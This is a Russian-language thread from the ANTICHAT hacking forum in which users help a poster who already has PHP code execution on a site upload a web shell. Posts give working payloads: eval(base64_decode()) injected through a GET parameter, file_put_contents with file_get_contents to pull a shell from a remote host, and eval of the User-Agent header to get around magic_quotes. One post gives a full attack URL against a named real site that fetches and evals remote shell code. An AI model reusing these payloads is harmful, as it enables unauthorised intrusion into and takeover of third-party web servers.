ANTICHAT — форум по информационной безопасности, OSINT и технологиям

http://base64.ru/

Кодируешь PHP код, затем юзаешь так:

mshell.php?p1r0=eval(base64_decode());

без '', и если спец символы на хвосте ("равно" например), то просто убирай их.

Думаю, должно сработать...

Не помогло, но спасибо.

ShellRoot

base64_decode тоже принимает стринг, поэтому кaвычки обязательны

2 TC

copy($_GET[a],$_GET);&a=...&b=

или

file_put_contents($_GET[a],file_get_contents($_GET));&a=&b=

пригодится

http://php.su/functions/?stripslashes

Konqi, сколько раз без кавычек делал норм, достаточно стринг сделать так:

$a = (textstring);

но вот если используются спец.символы, такие как точки и т.п тогда уже надо, но мы специально заюзали без "равно", или иначе заюзать из глобальной переменной

вот для начала и кури, что там выводится. Например allow_url_fopen = off - и всё, забудь про шелл с другого сайта - онли только грузить с локали.

Хочешь грамотный ответ - давай инфу по ключевым позициям. Из того же phpinfo. Что такое "там" ключевые позиции - думай сам.

PS: Прежде чем страдать херней и юзать всяческие аплоадеры - для начала найди папку, в которую ты можешь вообще писать в принципе, и проверить её еще на предмет запретных правил предварительно (ошибки вообще-то тоже фиксируются). На то у тебя уже есть огромные возможности - выполняется phpinfo() - Значит в твоем распоряжении вся мощь языка ПИЭЙЧПИ.

Кстати, стыдно задавать такие вопросы, если phpinfo() выполняется. И никакие статьи это не реабилитируют.

У тебя уже есть выполнение php-кода. Вообще-то это равно иметь шелл. Думай

Pashkela, стыдно задавать такие вопросы, но если их не задавать, то стыдится прийдется всегда!

Спасибо, вот щас сижу, думаю.

Странно то, что под бэйс64 кавычки выполняются на ура... Тоесть mq тут не причем.

UPD

________________________________________

Пробовал осздать файл, не помогло, не создается.... Идеи?

Еще как при чем. magic_quotes_gpc режет GPC массивы. Кавычки `бейсятся` и естественно пропускаются через magic_quotes попадая далее в последующую функцию.

Далее по делу:

http://site/?cmd=eval($_SERVER[HTTP_USER_AGENT]);

И модифицируй к виду HEADER: HTTP_USER_AGENT-> file_put_content('uploader.php','upload php code');

Это если php5 - если 4 пофантазируй. В пути также на директорию должны быть права.

Я не знаю какие у тебя ограничения в твоем случае. Мб поможет, в данном случае использование не GPC массива снимет слеширование через magic_quotes и прозволит использовать кавычки и указывать пути.

http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (тут_без_кавычек_адрес_твое� �о_шелла_например_http://site/shell.txt_только_в_base64)));

т.е. что-то типо этого:

http://www.datingfast.com/wp-atom.php?p1r0=eval(file_get_contents(base64_decode (aHR0cDovL3NpdGUvd3NvMl9ldmFsLnR4dA)));

НО, сначала почитай:

/thread191917.html

посмотри на дату и пусть тебе станет стыдно

PS: пох на права, шелл там льется за 2 секунды

Не проверял, но по моему легко зальется wso pack shell - т.е. упакованный (размер имеет значение )

Никак не выходит... И не у меня одного, ещё пару человек пробовало. Далеко не новечки...